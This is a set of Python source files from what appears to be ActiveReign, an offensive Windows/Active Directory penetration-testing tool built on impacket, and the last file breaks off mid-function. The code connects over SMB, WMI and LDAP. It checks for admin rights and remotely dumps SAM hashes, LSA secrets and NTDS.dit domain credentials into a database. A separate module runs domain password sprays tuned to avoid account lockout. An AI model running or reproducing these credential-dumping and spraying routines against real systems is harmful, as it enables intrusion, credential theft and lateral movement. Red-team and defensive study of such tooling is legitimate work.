from ar3.core.connector import Connector
from ar3.ops.enum.polenum import SAMRDump
from ar3.helpers.misc import validate_ntlm, get_filestamp
class SmbCon(Connector):
def __init__(self, args, loggers, host, db):
Connector.__init__(self, args, loggers, host)
self.auth = False
self.con = False
self.client = ''.join([choice(ascii_letters + digits) for x in range(7)])
self.smbv1 = False
self.os = ''
self.admin = False
self.signing = False
self.os_arch = ''
self.remote_ops = None
self.bootkey = None
self.db = db
self.port = 445
#########################
# Session Management
#########################
def create_smb_con(self):
# @TODO refactor, called by spider & file search to create con
if self.smb_connection():
try:
self.login()
except Exception as e:
raise Exception(str(e))
else:
raise Exception('Connection to Server Failed')
def login(self):
self.con.login(self.username, self.password, self.domain, lmhash=self.lmhash, nthash=self.nthash)
self.auth = True
self.isAdmin()
self.updatedb_user()
def updatedb_user(self):
if self.username and self.password or self.username and self.hash:
self.db.update_user(self.username, self.password, self.domain, self.hash)
if self.admin:
self.db.update_admin(self.username, self.domain, self.host)
def logoff(self):
self.con.logoff()
def close(self):
try:
self.con.logoff()
except:
pass
try:
self.con.close()
except:
pass
################################
#
# SMB Connection
#
################################
def smb_connection(self):
if self.smbv1_con():
return True
elif self.smbv3_con():
return True
return False
def smbv1_con(self):
try:
self.con = SMBConnection(self.client, self.ip, sess_port=self.port, preferredDialect=SMB_DIALECT, timeout=int(self.timeout))
self.smbv1=True
self.con.setTimeout(self.timeout)
self.logger.debug('SMBv1: Connected to: {}'.format(self.ip))
return True
except Exception as e:
self.logger.debug('SMBv1: Error creating connection to {}: {}'.format(self.host, e))
return False
def smbv3_con(self):
try:
self.con = SMBConnection(self.client, self.ip, sess_port=self.port, timeout=int(self.timeout))
self.con.setTimeout(self.timeout)
self.logger.debug('SMBv3: Connected to: {}'.format(self.ip))
return True
except Exception as e:
self.logger.debug('SMBv3: Error creating connection to {}: {}'.format(self.ip, e))
return False
#########################
# Authentication (NOT IN USE)
#########################
def set_host(self, local_auth):
# Get domain for authentication purposes
if local_auth:
self.domain = self.con.getServerName() + "." + self.con.getServerDNSDomainName()
else:
self.domain = self.con.getServerDNSDomainName()
# Backup for Linux/Unix systems
if not self.domain:
self.domain = self.con.getServerName() + "." + self.con.getServerDNSDomainName()
################################
# Enumerate Host information
################################
def host_info(self):
try:
self.con.login('', '')
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.getErrorString():
pass
self.srvdomain = self.con.getServerDomain() # Demo
self.host = self.get_hostname()
self.os = self.con.getServerOS() # Windows 10 Build 17134
self.signing = self.con.isSigningRequired() # True/False
if not self.srvdomain:
self.srvdomain = self.con.getServerName()
arch = self.get_os_arch()
if arch != 0:
self.os_arch = " x{}".format(str(arch))
if self.con.getServerDNSDomainName():
domain = self.con.getServerDNSDomainName()
else:
domain = self.ip
try:
# Log off before attempting new auth
self.logoff()
except:
pass
self.db.update_host(self.host, self.ip, domain, self.os, self.signing)
if self.args.gen_relay_list and not self.signing:
self.loggers['relay_list'].info(self.ip)
self.smb_connection()
def get_os_arch(self):
# Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except:
return 0
def get_hostname(self):
if self.con.getServerDNSDomainName() and (self.con.getServerName().lower() != self.con.getServerDNSDomainName().lower()):
return (self.con.getServerName() + "." + self.con.getServerDNSDomainName())
else:
return self.con.getServerName()
def list_shares(self):
# name=share['shi1_netname'][:-1], description=share['shi1_remark']
return self.con.listShares()
################################
# Host/Domain Password Policy
################################
def password_policy(self):
SAMRDump(self).dump(self.host)
################################
# List Shares & Check Share Permissions
################################
def read_perm(self, share):
try:
# Silently list path to check access
self.list_path(share, False)
return True
except:
return False
def write_perm(self, share):
try:
# Create dir to check write access
tmp = '.' + ''.join([choice(ascii_letters + digits) for x in range(5)])
self.con.createDirectory(share, tmp)
self.con.deleteDirectory(share, tmp)
return True
except Exception as e:
return False
def list_path(self, share, path):
if not path:
path = '/*'
return self.con.listPath(share, path)
################################
# Check if User Admin
################################
def isAdmin(self):
try:
rpctransport = SMBTransport(self.host, self.port, r'\svcctl', smb_connection=self.con)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except:
pass
else:
dce.bind(scmr.MSRPC_UUID_SCMR)
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host), 'ServicesActive\x00', 0xF003F)
self.admin = True
return True
except scmr.DCERPCException as e:
pass
except Exception as e:
print(e)
return False
################################
# Dump SAM / LSA
# Methods were modified from:
# https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
################################
def enable_remoteops(self):
try:
self.remote_ops = RemoteOperations(self.con, False, None)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail('RemoteOperations failed for {}: {}'.format(self.host, str(e)))
def sam(self):
def add_sam_hash(sam_hash, host):
self.logger.success([self.host, self.ip, "SAM HASH", sam_hash])
username, _, lmhash, nthash, _, _, _ = sam_hash.split(':')
self.db.update_user(username, '', host, "{}:{}".format(lmhash, nthash))
add_sam_hash.added_to_db += 1
try:
# Output File
file_name = '{}_{}'.format(self.host.lower(), get_filestamp())
outfile = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', self.args.workspace, file_name)
add_sam_hash.added_to_db = 0
self.enable_remoteops()
if self.remote_ops and self.bootkey:
SAMFileName = self.remote_ops.saveSAM()
SAM = SAMHashes(SAMFileName, self.bootkey, isRemote=True, perSecretCallback=lambda secret: add_sam_hash(secret, self.host))
SAM.dump()
SAM.export(outfile)
except Exception as e:
self.logger.debug('SAM Extraction Failed for {}: {}'.format(self.host, str(e)))
if add_sam_hash.added_to_db > 0:
self.logger.success([self.host, self.ip, "SAM HASH", '{} hashes added to the database'.format(add_sam_hash.added_to_db)])
self.logger.info([self.host, self.ip, "SAM HASH", 'Output saved to: {}.sam'.format(outfile)])
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(["SAM", "Error calling remote_ops.finish(): {}".format(e)])
SAM.finish()
def lsa(self):
def add_lsa_secret(secret):
for x in secret.splitlines():
self.logger.success([self.host, self.ip, "LSA SECRET", x])
add_lsa_secret.secrets += 1
try:
# Output File
file_name = '{}_{}'.format(self.host.lower(), get_filestamp())
outfile = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', self.args.workspace, file_name)
# Dump
add_lsa_secret.secrets = 0
self.enable_remoteops()
if self.remote_ops and self.bootkey:
SECURITYFileName = self.remote_ops.saveSECURITY()
LSA = LSASecrets(SECURITYFileName, self.bootkey, self.remote_ops, isRemote=True, perSecretCallback=lambda secretType, secret: add_lsa_secret(secret))
LSA.dumpCachedHashes()
LSA.exportCached(outfile)
LSA.dumpSecrets()
LSA.exportSecrets(outfile)
except Exception as e:
self.logger.debug('LSA Extraction Failed for {}: {}'.format(self.host, str(e)))
if add_lsa_secret.secrets > 0:
self.logger.info([self.host, self.ip, "LSA SECRET", 'Output saved to: {}.secrets'.format(outfile)])
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(["LSA", "Error calling remote_ops.finish(): {}".format(e)])
LSA.finish()
def ntds(self):
def add_ntds_hash(ntds_hash):
if ntds_hash.find('$') == -1:
if "CLEARTEXT" in ntds_hash:
try:
username, password = ntds_hash.split(":CLEARTEXT:")
add_ntds_hash.clear_text += 1
domain, username = username.split("\\")
self.db.update_user(username, password, domain, '')
add_ntds_hash.added_to_db += 1
except:
self.logger.fail("Error adding clear text cred to db: {}".format(ntds_hash))
else:
if ntds_hash.find('\\') != -1:
domain, hash = ntds_hash.split('\\')
else:
domain = self.domain
hash = ntds_hash
try:
username, _, lmhash, nthash, _, _, _ = hash.split(':')
parsed_hash = ':'.join((lmhash, nthash))
if validate_ntlm(parsed_hash):
add_ntds_hash.ntds_hashes += 1
self.db.update_user(username, '', domain, "{}:{}".format(lmhash,nthash))
add_ntds_hash.added_to_db += 1
except:
self.logger.debug("Skipping non-NTLM hash: {}".format(ntds_hash))
else:
self.logger.debug("Skipping computer account")
try:
self.enable_remoteops()
use_vss_method = self.args.use_vss
NTDSFileName = None
add_ntds_hash.ntds_hashes = 0
add_ntds_hash.clear_text = 0
add_ntds_hash.added_to_db = 0
# Output File
file_name = '{}_{}'.format(self.host.lower(), get_filestamp())
outfile = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', self.args.workspace, file_name)
if self.remote_ops and self.bootkey:
if self.args.ntds is 'vss':
NTDSFileName = self.remote_ops.saveNTDS()
use_vss_method = True
NTDS = NTDSHashes(NTDSFileName, self.bootkey, isRemote=True, history=False, noLMHash=True,
remoteOps=self.remote_ops, useVSSMethod=use_vss_method, justNTLM=False,
pwdLastSet=False, resumeSession=None, outputFileName=outfile,
justUser=None, printUserStatus=False,
perSecretCallback=lambda secretType, secret: add_ntds_hash(secret))
self.logger.info([self.host, self.ip, "NTDS", 'Extracting NTDS.dit, this could take a few minutes...'])
NTDS.dump()
self.logger.success([self.host, self.ip, "NTDS", '{} hashes and {} passwords collected'.format(add_ntds_hash.ntds_hashes, add_ntds_hash.clear_text)])
self.logger.success([self.host, self.ip, "NTDS", '{} creds added to the database'.format(add_ntds_hash.added_to_db)])
self.logger.info([self.host, self.ip, "NTDS", 'Hash files located at: {}'.format(outfile)])
else:
raise Exception("RemoteOps and BootKey not initiated")
except Exception as e:
self.logger.fail('NTDS Extraction Failed for {}: {}'.format(self.host, str(e)))
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(["NTDS", "Error calling remote_ops.finish(): {}".format(e)])
NTDS.finish()
################################
# File Interaction
################################
def createFile(self, filename, data, share='C$'):
# Create new file & write data, Not In Use
f = remotefile.RemoteFile(self.con, filename, share)
f.create()
f.write(data)
f.close()
def uploadFile(self, local_file, location, share='C$'):
f = open(local_file, 'rb')
self.con.putFile(share, location, f.read)
f.close()
def downloadFile(self, remote_file, location='ar3_download', remote_share='C$'):
f = open(location, 'wb')
self.con.getFile(remote_share, remote_file, f.write)
f.close()
def deleteFile(self, remote_file, share='C$'):
self.con.deleteFile(share, remote_file.replace('\\','/')) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/smb.py | smb.py |
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import WBEM_FLAG_FORWARD_ONLY
from ar3.logger import highlight
from ar3.core.connector import Connector
class WmiCon(Connector):
def __init__(self, args, loggers, ip, host):
Connector.__init__(self, args, loggers, ip)
self.display_ip = ip
self.display_host = host
self._debug = False
self.dcom = None
self.wmi_con = None
self.process_list = {}
def create_wmi_con(self, namespace='root\\cimv2'):
self.dcom = DCOMConnection(self.host, self.username, self.password, self.domain, self.lmhash, self.nthash)
iInterface = self.dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
self.wmi_con = iWbemLevel1Login.NTLMLogin('\\\\{}\\{}'.format(self.host, namespace), NULL, NULL)
def get_netprocess(self, tasklist=False):
self.create_wmi_con()
wmi_enum_process = self.wmi_con.ExecQuery('SELECT * from Win32_Process', lFlags=WBEM_FLAG_FORWARD_ONLY)
while True:
try:
wmi_process = wmi_enum_process.Next(0xffffffff, 1)[0]
wmi_process_owner = wmi_process.GetOwner()
attributes = {'computername': self.host,
'processname': wmi_process.Name,
'processid': wmi_process.ProcessId,
'user': wmi_process_owner.User,
'domain': wmi_process_owner.Domain}
# Dont wait until end to print
if tasklist:
self.logger.info([self.display_host, self.display_ip, "TASKLIST","PID: {:<6} Name: {:<20} User: {:<17} Host: {:<15} Domain: {}".
format(attributes['processid'], attributes['processname'], attributes['user'],
attributes['computername'], attributes['domain'])])
self.process_list[wmi_process.ProcessId] = attributes
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug( "Get-NetProcess: {}".format(str(e)))
else:
break
self.disconnect()
def get_netlocalgroups(self):
self.create_wmi_con('root\\cimv2')
query = 'Select Name from win32_group'
wmi_query = self.wmi_con.ExecQuery(query, lFlags=WBEM_FLAG_FORWARD_ONLY)
while True:
try:
wmi_results = wmi_query.Next(0xffffffff, 1)[0]
wmi_results = wmi_results.getProperties()
for key,value in wmi_results.items():
self.logger.info([self.display_host, self.display_ip, "LOCAL GROUPS", value['value']])
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug([self.display_host, self.display_ip, "LOCAL GROUPS", str(e)])
else:
break
self.disconnect()
def get_localgroup_members(self, domain, group):
self.create_wmi_con('root\\cimv2')
query = "SELECT PartComponent FROM Win32_GroupUser WHERE GroupComponent=\"Win32_Group.Domain='{}',Name='{}'\"".format(domain, group)
wmi_query = self.wmi_con.ExecQuery(query, lFlags=WBEM_FLAG_FORWARD_ONLY)
while True:
try:
wmi_results = wmi_query.Next(0xffffffff, 1)[0]
wmi_results = wmi_results.getProperties()
for key,value in wmi_results.items():
member = self.parse_local_members(value['value'])
self.logger.info([self.display_host, self.display_ip, "LOCAL MEMBERS", "{:<30} {}".format(group.title(), member)])
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug([self.display_host, self.display_ip, "LOCAL MEMBERS", str(e)])
else:
break
self.disconnect()
def parse_local_members(self, line):
# Parse domain\account_name from wmi output query
try:
data = line.split('.')[1]
domain, account = data.split(',')
return "{}\\{}".format(domain.split("=")[1].strip("\""), account.split("=")[1].strip("\""))
except:
return line
def wmi_query(self,namespace, query, name="WMI QUERY"):
self.create_wmi_con(namespace)
wmi_query = self.wmi_con.ExecQuery(query, lFlags=WBEM_FLAG_FORWARD_ONLY)
while True:
try:
wmi_results = wmi_query.Next(0xffffffff, 1)[0]
wmi_results = wmi_results.getProperties()
for k,v in wmi_results.items():
self.logger.info([self.display_host, self.display_ip, name, "{:<30} {}".format(k, v['value'])])
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug( "WMIQuery: {}".format(str(e)))
else:
break
self.disconnect()
def disconnect(self):
self.dcom.disconnect() | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/wmi.py | wmi.py |
QUERIES = { 'users_active' : '(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))',
'users_all' : '(&(objectCategory=person)(objectClass=user))',
'users_admin' : '(&(objectCategory=person)(objectClass=user)(admincount=1))',
'users_email_search' : '(&(objectClass=user)(mail={}))',
'users_account_search' : '(&(objectClass=user)(sAMAccountName={}))',
'cpu_all' : '(&(objectClass=Computer))',
'cpu_search' : '(&(objectClass=Computer)(dNSHostName={}*))',
'groups_all' : '(&(objectCategory=group))',
'group_members' : '(&(objectCategory=group)(sAMAccountName={}))',
'domain_policy' : '(objectClass=domain)',
'domain_trust' : '(objectClass=trustedDomain)',
'reversible_encryption' : '(&(objectClass=user)(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=128))',
'pass_never_expire' : '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))',
'pass_not_required' : '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))'
}
ATTRIBUTES = { 'users' : [ 'Name', 'userPrincipalName', 'sAMAccountName', 'mail', 'company', 'department', 'mobile',
'telephoneNumber', 'badPwdCount', 'userWorkstations', 'manager', 'memberOf', 'manager',
'whenCreated', 'whenChanged', 'Comment', 'Info', 'Description','userAccountControl'],
'cpu' : ['dNSHostName', 'operatingSystem', 'operatingSystemVersion', 'operatingSystemServicePack', 'Description'],
'groups': ['distinguishedName', 'cn', 'name', 'sAMAccountName', 'sAMAccountType', 'whenCreated', 'whenChanged', 'Description'],
'domain': [ 'cn', 'dc', 'distinguishedName', 'lockOutObservationWindow', 'lockoutDuration',
'lockoutThreshold', 'maxPwdAge', 'minPwdAge', 'minPwdLength', 'pwdProperties',
'pwdHistoryLength', 'nextRid', 'dn',],
'trust' : ['cn', 'flatName', 'name', 'objectClass', 'trustAttributes', 'trustDirection', 'trustPartner',
'trustType'],
}
UAC_LOOKUP = {
'1' : 'SCRIPT',
'2' : 'ACCOUNTDISABLE',
'8' : 'HOMEDIR_REQUIRED',
'16' : 'LOCKOUT',
'32' : 'PASSWD_NOTREQD',
'64' : 'PASSWD_CANT_CHANGE',
'128' : 'ENCRYPTED_TEXT_PWD_ALLOWED',
'256' : 'TEMP_DUPLICATE_ACCOUNT',
'512' : 'NORMAL_ACCOUNT',
'514' : 'Disabled Account',
'544' : 'Enabled, Password Not Required',
'546' : 'Disabled, Password Not Required',
'2048' : 'INTERDOMAIN_TRUST_ACCOUNT',
'4096' : 'WORKSTATION_TRUST_ACCOUNT',
'8192' : 'SERVER_TRUST_ACCOUNT',
'65536' : 'DONT_EXPIRE_PASSWORD',
'66048' : 'Enabled, Password Doesnt Expire',
'66050' : 'Disabled, Password Doesnt Expire',
'66082' : 'Disabled, Password Doesnt Expire, & Not Required',
'131072' : 'MNS_LOGON_ACCOUNT',
'262144' : 'SMARTCARD_REQUIRED',
'262656' : 'Enabled, Smartcard Required',
'262658' : 'Disabled, Smartcard Required',
'262690' : 'Disabled, Smartcard Required, Password Not Required',
'328194' : 'Disabled, Smartcard Required, Password Doesnt Expire',
'328226' : 'Disabled, Smartcard Required, Password Doesnt Expire, & Not Required',
'524288' : 'TRUSTED_FOR_DELEGATION',
'532480' : 'Domaincontroller',
'1048576' : 'NOT_DELEGATED',
'2097152' : 'USE_DES_KEY_ONLY',
'4194304' : 'DONT_REQ_PREAUTH',
'8388608' : 'PASSWORD_EXPIRED',
'16777216' : 'TRUSTED_TO_AUTH_FOR_DELEGATION',
'67108864' : 'PARTIAL_SECRETS_ACCOUNT'
} | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/ldap/query.py | query.py |
from impacket.ldap import ldap
from ar3.core.connector import Connector
from ar3.core.ldap.query import QUERIES, ATTRIBUTES
class LdapCon(Connector):
def __init__(self, args, loggers, host, db):
Connector.__init__(self, args, loggers, host)
self.ldaps = False
self.con = None
self.data = {}
self.set_baseDN()
self.db = db
##################################################
# Ldap Connection & Authentication
##################################################
def create_ldap_con(self):
if self.ldap_connection():
try:
self.con._socket.settimeout(self.timeout)
self.con.login(self.username, self.password, self.domain, lmhash=self.lmhash, nthash=self.nthash)
self.db.update_user(self.username, self.password, self.domain, self.hash)
except Exception as e:
raise Exception(str(e))
else:
raise Exception('Connection to server failed')
def ldap_connection(self,):
if self.ldap_con():
return True
elif self.ldaps_con():
return True
return False
def ldap_con(self):
try:
self.con = ldap.LDAPConnection("ldap://{}".format(self.ip))
return True
except:
return False
def ldaps_con(self):
try:
self.con = ldap.LDAPConnection("ldaps://{}".format(self.ip))
self.ldaps = True
return True
except:
return False
##################################################
# Ldap Query Functions
##################################################
def set_baseDN(self):
self.baseDN = ''
# Set domain name for baseDN
try:
for x in self.domain.split('.'):
self.baseDN += 'dc={},'.format(x)
# Remove last ','
self.baseDN = self.baseDN[:-1]
except:
self.baseDN = 'dc={}'.format(self.domain)
def execute_query(self, searchFilter, attrs, parser):
sc = ldap.SimplePagedResultsControl(size=9999)
try:
self.con.search(searchBase=self.baseDN, searchFilter=searchFilter, attributes=attrs, searchControls=[sc], sizeLimit=0, timeLimit=50, perRecordCallback=parser)
except ldap.LDAPSearchError as e:
raise Exception("ldap_query error: {}".format(str(e)))
def ldap_query(self, search, attrs, parser):
self.data = {}
self.execute_query(search, attrs, parser)
return self.data
##################################################
# Ldap Search Types
##################################################
def user_query(self, query, attrs, all_users=False):
if attrs:
ATTRIBUTES['users'] = ATTRIBUTES['users'] + attrs
search = QUERIES['users_active']
if all_users:
# Query all users, even disabled
search = QUERIES['users_all']
elif '@' in query:
search = QUERIES['users_email_search'].format(query.lower())
elif query and query not in ['active', 'Active', '{active}']:
search = QUERIES['users_account_search'].format(query.lower())
return self.ldap_query(search, ATTRIBUTES['users'], self.generic_parser)
def computer_query(self, query, attrs):
if attrs:
ATTRIBUTES['cpu'] = ATTRIBUTES['cpu'] + attrs
if query and query != 'eol':
self.ldap_query(QUERIES['cpu_search'].format(query), ATTRIBUTES['cpu'], self.generic_parser)
else:
self.ldap_query(QUERIES['cpu_all'], ATTRIBUTES['cpu'], self.generic_parser)
if query == "eol":
self.data = self.eol_filter(self.data)
return self.data
def group_query(self, attrs):
if attrs:
ATTRIBUTES['groups'] = ATTRIBUTES['groups'] + attrs
return self.ldap_query(QUERIES['groups_all'], attrs, self.generic_parser)
def group_membership(self, group, attrs):
ATTRS = ['member']
if attrs:
ATTRS = ATTRS + attrs
return self.ldap_query(QUERIES['group_members'].format(group), ATTRS, self.group_membership_parser)
def domain_query(self, attrs):
if attrs:
ATTRIBUTES['domain'] = ATTRIBUTES['domain'] + attrs
return self.ldap_query(QUERIES['domain_policy'], ATTRIBUTES['domain'], self.generic_parser)
def trust_query(self, attrs):
if attrs:
ATTRIBUTES['trust'] = ATTRIBUTES['trust'] + attrs
return self.ldap_query(QUERIES['domain_trust'], ATTRIBUTES['trust'], self.generic_parser)
def custom_query(self, query, attrs):
if not query or not attrs:
raise Exception("Query / Attributes not provided for custom LDAP search")
return self.ldap_query(query, attrs, self.generic_parser)
##################################################
# LDAP Data Parsers
##################################################
def convert(self, attr, value):
try:
if attr in ['lockOutObservationWindow', 'lockoutDuration']:
# Min
tmp = (abs(float(value)) * .0000001) / 60
value = str(tmp) + " Min."
elif attr in ['maxPwdAge', 'minPwdAge']:
tmp = (abs(float(value)) * .0000001) / 86400
value = str(tmp) + " Days"
except Exception as e:
pass
return value
def generic_parser(self, resp):
tmp = {}
dtype = ''
resp_data = ''
try:
for attr in resp['attributes']:
dtype = str(attr['type'])
# catch formatting issues
if "SetOf:" in str(attr['vals']):
resp_data = str(attr['vals'][0])
else:
resp_data = str(attr['vals'])
resp_data = self.convert(dtype, resp_data)
tmp[dtype] = resp_data
self.categorize(tmp)
del (tmp)
except:
pass
def group_membership_parser(self, resp):
try:
for attr in resp['attributes']:
for member in attr['vals']:
cn = str(member).split(',')[0]
search = "(&({}))".format(cn)
self.execute_query(search, ATTRIBUTES['users'], self.generic_parser)
except:
pass
def no_parser(self, resp):
# Used for custom queries not tested with parsers
print(resp)
def eol_filter(self, resp):
# Parse results looking for end of life systems
data = {}
for k, v in resp.items():
try:
if str(v['operatingSystemVersion']).startswith(('3', '4', '5', '6.0')):
data[k] = v
except:
pass
return data
def categorize(self, tmp):
# Take temp data, sort and move to class object
for x in ['sAMAccountName', 'dNSHostName', 'cn', 'dc']:
try:
self.data[tmp[x]] = tmp
return
except:
pass
##################################################
# Ldap Close Connection
##################################################
def close(self):
try:
self.con.close()
self.con._socket = None
self.con = None
except:
pass | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/ldap/__init__.py | __init__.py |
from sys import argv
from ipparser import ipparser
from argparse import Namespace
from ar3.helpers.misc import file_exists
from ar3.core.ldap import LdapCon
def spray_args(sub_parser):
# Create Subparser
spray_parser = sub_parser.add_parser("spray", help='- Domain password spray or brute force')
# Output / Display Options
spray_parser.add_argument('-t', dest='timeout', type=int, default=5,help='Wait time for recursive thread to find files in dir')
# Method
spray_parser.add_argument('-m', '--spray-method', dest="method", type=str, default='SMB', help="Spray Method {SMB, LDAP} (Default: SMB)")
# User
u = spray_parser.add_argument_group("User Options")
sp_user = u.add_mutually_exclusive_group(required=True)
sp_user.add_argument('-u', dest='user', type=str, action='append', help='User to spray {account name, ldap}')
sp_user.add_argument('-U', dest='user', default=False, type=lambda x: file_exists(sub_parser, x), help='User file to spray {Users.txt}')
sp_user.add_argument('--domain-users', dest='domain_users', action='store_true', help='Extract users from LDAP (domain password spray)')
# Password
p = spray_parser.add_argument_group("Password Options")
sp_pwd = p.add_mutually_exclusive_group()
sp_pwd.add_argument('-p', dest='passwd', action='append', default=[], help='Single password')
sp_pwd.add_argument('-P', dest='passwd', default='', type=lambda x: file_exists(sub_parser, x), help='Password file {pass.txt}')
sp_pwd.add_argument('--user-as-pass', dest="user_as_pass", action='store_true', help="Set username as password")
sp_pwd.add_argument('-C', '--combo-list', dest="combo", action='store_true', help="User:Pwd Combo list provided in user arg")
sp_pwd.add_argument('-H','-hashes', dest='hash', type=str, default='', help='Use Hash for authentication')
# Domain
spray_domain = spray_parser.add_mutually_exclusive_group(required=True)
spray_domain.add_argument('-d', dest='domain', type=str, default='', help='Set domain')
spray_domain.add_argument('--local-auth', dest='local_auth', action='store_true', help='Authenticate to target host, no domain')
# Timing options
spray_parser.add_argument('-j', dest='jitter', type=float, default=0, help='jitter (sec)')
# ldap Authentication to collect users and/or targets
ldap = spray_parser.add_argument_group("LDAP Options")
ldap.add_argument('--force-all', dest="force_all", action='store_true', help="Spray all users, regardless of BadPwd count")
ldap.add_argument('--threshold', dest='default_threshold', type=int, default=3, help='Set lockout threshold, if failed to aquire from domain (default: 3')
target = spray_parser.add_argument_group("Target Options")
targets = target.add_mutually_exclusive_group(required=True)
targets.add_argument(dest='target', nargs='?', help='Positional argument, Accepts: target.txt, 127.0.0.0/24, ranges, 192.168.1.1')
targets.add_argument('--ldap', dest='ldap', action='store_true', help='Use LDAP to target all domain systems')
target.add_argument('--ldap-srv', dest='ldap_srv', type=str, default='', help='Define LDAP server (Optional)')
target.add_argument('-id', dest='cred_id', type=int, help='Extract creds from DB for LDAP connection')
def spray_arg_mods(args, db_obj, loggers):
logger = loggers['console']
# Modify Max Threads, unless modified by user
if '-T' not in argv:
args.max_threads = 5
if not args.passwd:
args.passwd = ['']
if args.method.lower() == 'ldap' and args.local_auth:
logger.warning('Cannot use LDAP spray method with local authentication')
exit(0)
if not args.ldap:
args.target = ipparser(args.target)
if args.ldap or args.domain_users:
if not args.cred_id:
logger.warning("To use this feature, please choose a cred id from the database")
logger.warning("Insert credentials:\r\n activereign db insert -u username -p Password123 -d domain.local")
exit(0)
# Extract creds from db for Ldap query
ldap_user = db_obj.extract_user(args.cred_id)
if ldap_user:
context = Namespace(
mode = args.mode,
timeout = args.timeout,
local_auth = False,
debug = args.debug,
user = ldap_user[0][0],
passwd = ldap_user[0][1],
hash = ldap_user[0][2],
domain = ldap_user[0][3],
)
if context.hash:
logger.status(['LDAP Authentication', '{}\{} (Password: None) (Hash: True)'.format(context.domain, context.user)])
else:
logger.status(['LDAP Authentication','{}\{} (Password: {}*******) (Hash: False)'.format(context.domain, context.user, context.passwd[:1])])
try:
# Define LDAP server to use for query
l = LdapCon(context, loggers, args.ldap_srv, db_obj)
l.create_ldap_con()
if not l:
logger.status_fail(['LDAP Connection', 'Unable to create LDAP connection'])
exit(1)
logger.status_success(['LDAP Connection','Connection established (server: {}) (LDAPS: {})'.format(l.host,l.ldaps)])
########################################
# Get users via LDAP
########################################
if args.domain_users:
tmp_users = l.user_query('active', False)
if args.force_all:
# Force spray on all users in domain - not recommended
args.user = tmp_users.keys()
try:
args.user.remove(context.user)
logger.status_success2("Removed User: {} (Query User)".format(context.user))
except:
pass
logger.status_success('{0}/{0} users collected'.format(len(args.user)))
else:
users = []
# Check BadPwd Limit vs Lockout Threshold
try:
tmp = l.domain_query(False)
lockout_threshold = int(tmp[list(tmp.keys())[0]]['lockoutThreshold'])
logger.status_success("Domain lockout threshold detected: {}\t Logon_Server: {}".format(lockout_threshold, l.host))
except:
# go through iteration: look for arg, checkdb, use default
logger.status_fail('Lockout threshold failed, using default threshold of {}'.format(args.default_threshold))
lockout_threshold=args.default_threshold
# Compare and create user list
for user, data in tmp_users.items():
try:
if user.lower() == context.user.lower():
logger.status_success2(["Removed User: {}".format(context.user), "(Query User)"])
elif db_obj.pwd_check(context.domain.lower(), user.lower()):
logger.status_success2(["Removed User: {}".format(user), "(Pwd Known)"])
elif int(data['badPwdCount']) >= (lockout_threshold - 1):
logger.status_success2(["Removed User: {}".format(user), "(BadPwd: {})".format(data['badPwdCount'])])
else:
users.append(user)
except:
# no badPwdCount value exists
users.append(user)
args.user = users
logger.status_success('{}/{} users collected'.format(len(args.user), len(tmp_users)))
########################################
# get targets via ldap
########################################
if args.ldap:
args.target = list(l.computer_query(False, False).keys())
logger.status_success('{} computers collected'.format(len(args.target)))
l.close()
except Exception as e:
logger.fail("Ldap Connection Error: {}".format(str(e)))
exit(1)
else:
logger.fail("Unable to gather creds from db, try again")
exit(0)
return args | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/spray/arg_parser.py | arg_parser.py |
from os import _exit
from time import sleep
from argparse import Namespace
from threading import Thread, activeCount
from ar3.core.smb import SmbCon
from ar3.logger import highlight
from ar3.core.ldap import LdapCon
from ar3.helpers.misc import get_timestamp
def main(args, config_obj, db_obj, loggers):
for passwd in args.passwd:
# Indicate start
if args.hash:
loggers['console'].info("\033[1;30mPerforming Password Spray @ {} [Users: {}] [Hash: True] [Method: {}]\033[0m".format(get_timestamp(), len(args.user), args.method))
else:
